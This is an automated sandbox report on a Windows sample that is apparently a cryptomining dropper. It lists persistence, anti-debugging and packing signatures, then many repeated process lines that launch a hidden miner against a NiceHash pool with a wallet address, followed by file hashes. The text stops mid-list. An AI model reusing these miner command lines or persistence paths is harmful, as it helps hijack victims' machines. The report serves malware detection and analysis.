Analysis Overview
SHA256
c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
Threat Level: Shows suspicious behavior
The file 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Checks computer location settings
Drops startup file
Executes dropped EXE
VMProtect packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 15:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 15:54
Reported
2024-05-20 15:57
Platform
win7-20240221-en
Max time kernel
150s
Max time network
122s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Executes dropped EXE
Loads dropped DLL
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
Network
Files
C:\ProgramData\Windows\svchost.vbs
| MD5 | f4b667fe8d75278dffe4fa57d5b7212c |
| SHA1 | 05bc96683ea77d081fedcd810c4de7e9c5bb833a |
| SHA256 | 4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922 |
| SHA512 | 52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41 |
C:\ProgramData\Windows\csrs.exe
| MD5 | e3427d9f439aebefa3d9c299e2a94af3 |
| SHA1 | ffff4672790378677ec30d3634fc593c10dfd37e |
| SHA256 | 7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba |
| SHA512 | a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b |
memory/2476-11-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/2512-13-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2512-14-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2512-23-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2384-26-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2384-27-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2384-36-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2896-39-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2896-40-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2896-49-0x0000000000E70000-0x00000000011DB000-memory.dmp
memory/2716-52-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2716-53-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2716-62-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2200-65-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2200-74-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/1408-77-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/1408-86-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/1700-89-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/1700-90-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/1700-99-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2476-101-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/2080-103-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/2080-112-0x0000000001190000-0x00000000014FB000-memory.dmp
memory/784-115-0x0000000000330000-0x000000000069B000-memory.dmp
memory/784-116-0x0000000000330000-0x000000000069B000-memory.dmp
memory/2476-122-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/784-126-0x0000000000330000-0x000000000069B000-memory.dmp
memory/2476-128-0x0000000004690000-0x00000000049FB000-memory.dmp
memory/1720-130-0x0000000000820000-0x0000000000B8B000-memory.dmp
memory/1720-139-0x0000000000820000-0x0000000000B8B000-memory.dmp
memory/1108-142-0x00000000010D0000-0x000000000143B000-memory.dmp
memory/1108-143-0x00000000010D0000-0x000000000143B000-memory.dmp
memory/1108-152-0x00000000010D0000-0x000000000143B000-memory.dmp
memory/2476-156-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/2476-155-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/3012-157-0x0000000001170000-0x00000000014DB000-memory.dmp
memory/3012-166-0x0000000001170000-0x00000000014DB000-memory.dmp
memory/1160-169-0x0000000001170000-0x00000000014DB000-memory.dmp
memory/1160-178-0x0000000001170000-0x00000000014DB000-memory.dmp
memory/2476-180-0x0000000004690000-0x00000000049FB000-memory.dmp
memory/2240-182-0x00000000000C0000-0x000000000042B000-memory.dmp
memory/2240-183-0x00000000000C0000-0x000000000042B000-memory.dmp
memory/2240-192-0x00000000000C0000-0x000000000042B000-memory.dmp
memory/2476-195-0x0000000004610000-0x000000000497B000-memory.dmp
memory/2940-196-0x0000000001180000-0x00000000014EB000-memory.dmp
memory/1900-207-0x0000000001180000-0x00000000014EB000-memory.dmp
memory/2888-218-0x0000000001180000-0x00000000014EB000-memory.dmp
memory/2960-229-0x0000000000210000-0x000000000057B000-memory.dmp
memory/2476-231-0x0000000004490000-0x00000000047FB000-memory.dmp
memory/2748-241-0x0000000000AB0000-0x0000000000E1B000-memory.dmp
memory/340-252-0x0000000000E50000-0x00000000011BB000-memory.dmp
memory/1516-263-0x0000000000230000-0x000000000059B000-memory.dmp
memory/544-274-0x0000000000DD0000-0x000000000113B000-memory.dmp
memory/772-285-0x0000000000160000-0x00000000004CB000-memory.dmp
memory/1740-296-0x00000000012A0000-0x000000000160B000-memory.dmp
memory/2764-307-0x00000000012A0000-0x000000000160B000-memory.dmp
memory/2808-318-0x0000000000180000-0x00000000004EB000-memory.dmp
memory/1576-329-0x0000000000F10000-0x000000000127B000-memory.dmp
memory/3048-340-0x0000000000F10000-0x000000000127B000-memory.dmp
memory/2192-351-0x0000000001090000-0x00000000013FB000-memory.dmp
memory/1520-366-0x00000000011D0000-0x000000000153B000-memory.dmp
memory/2940-375-0x00000000000C0000-0x000000000042B000-memory.dmp
memory/2288-384-0x00000000013A0000-0x000000000170B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 15:54
Reported
2024-05-20 15:57
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
106s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Executes dropped EXE
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
C:\ProgramData\Windows\csrs.exe
